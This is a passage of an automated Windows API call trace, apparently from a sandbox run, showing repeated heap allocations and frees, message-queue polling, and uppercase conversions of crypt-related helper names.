lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0264.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0264.543] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0264.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0264.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0264.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0264.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b68 [0264.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b18 [0264.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0264.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0264.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0264.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0264.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0264.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0264.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0264.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf8b0) returned 0xe5f900 [0264.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0264.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0264.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b18 | out: hHeap=0x970000) returned 1 [0264.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0264.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0264.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0264.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0264.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0264.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0264.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0264.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0264.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0264.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf8b0) returned 0xe6f1b8 [0264.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe5f900 | out: hHeap=0x970000) returned 1 [0264.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0264.548] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0264.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0264.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0264.548] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0264.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0264.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0264.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0264.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0264.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0264.548] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0264.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0264.548] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0264.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0264.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0264.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518c8 [0264.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0264.549] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0264.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0264.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0264.549] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0264.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0264.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0264.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a18 [0264.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0264.549] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0264.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0264.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0264.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0264.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0264.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0264.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0264.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0264.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0264.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0264.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b98 [0264.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0264.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518e0 [0264.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51ad8 [0264.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b08 [0264.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0264.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0264.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518f8 [0264.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51928 [0264.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a90 [0264.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0264.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0264.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0264.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0264.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0264.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0264.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0264.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0264.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0264.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0264.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0264.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0264.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0264.550] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0264.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0264.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0264.550] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0264.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0264.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0264.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0264.550] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0264.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0264.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0264.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a18 [0264.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0264.550] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0264.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0264.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0264.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0264.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0264.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0264.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0264.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0264.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0264.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0264.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0264.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0264.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0264.551] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0264.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0264.551] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0264.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0264.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0264.551] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0264.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0264.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0264.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0264.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0264.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0264.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0264.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0264.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0264.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0264.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0264.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf8b0) returned 0xe5f900 [0264.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0264.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0264.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf8b0) returned 0xe7ea70 [0264.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0264.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0264.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe5f900 | out: hHeap=0x970000) returned 1 [0264.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0264.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0264.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0264.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0264.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0264.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf8b0) returned 0xe5f900 [0264.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe7ea70 | out: hHeap=0x970000) returned 1 [0264.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0264.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0264.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf8b0) returned 0xe7ea70 [0264.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe5f900 | out: hHeap=0x970000) returned 1 [0264.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0264.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0264.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0264.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0264.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0264.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0264.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0264.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0264.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0264.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0264.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0264.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0264.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551e8 | out: hHeap=0x970000) returned 1 [0264.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0264.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0264.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0264.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0264.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520a8 | out: hHeap=0x970000) returned 1 [0264.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0264.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55298 | out: hHeap=0x970000) returned 1 [0264.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14f50 | out: hHeap=0x970000) returned 1 [0264.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0264.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0264.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0264.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0264.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0264.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0264.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0264.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0264.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0264.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0264.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0264.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0264.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe50048 | out: hHeap=0x970000) returned 1 [0264.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0264.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0264.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0264.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0264.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0264.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0264.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0264.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0264.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0264.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0264.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0264.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0264.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0264.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0264.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0264.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0264.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0264.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f35188 | out: hHeap=0x970000) returned 1 [0264.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0264.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0264.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0264.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0264.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0264.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe6f1b8 | out: hHeap=0x970000) returned 1 [0264.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0264.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0264.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0264.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0264.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0264.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0264.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0264.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0264.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0264.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0264.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0264.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f16018 | out: hHeap=0x970000) returned 1 [0264.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0264.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0264.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0264.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0264.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0264.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0264.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0264.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f258d0 | out: hHeap=0x970000) returned 1 [0264.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0264.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0264.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf8b0) returned 0xe8e328 [0264.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe7ea70 | out: hHeap=0x970000) returned 1 [0264.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 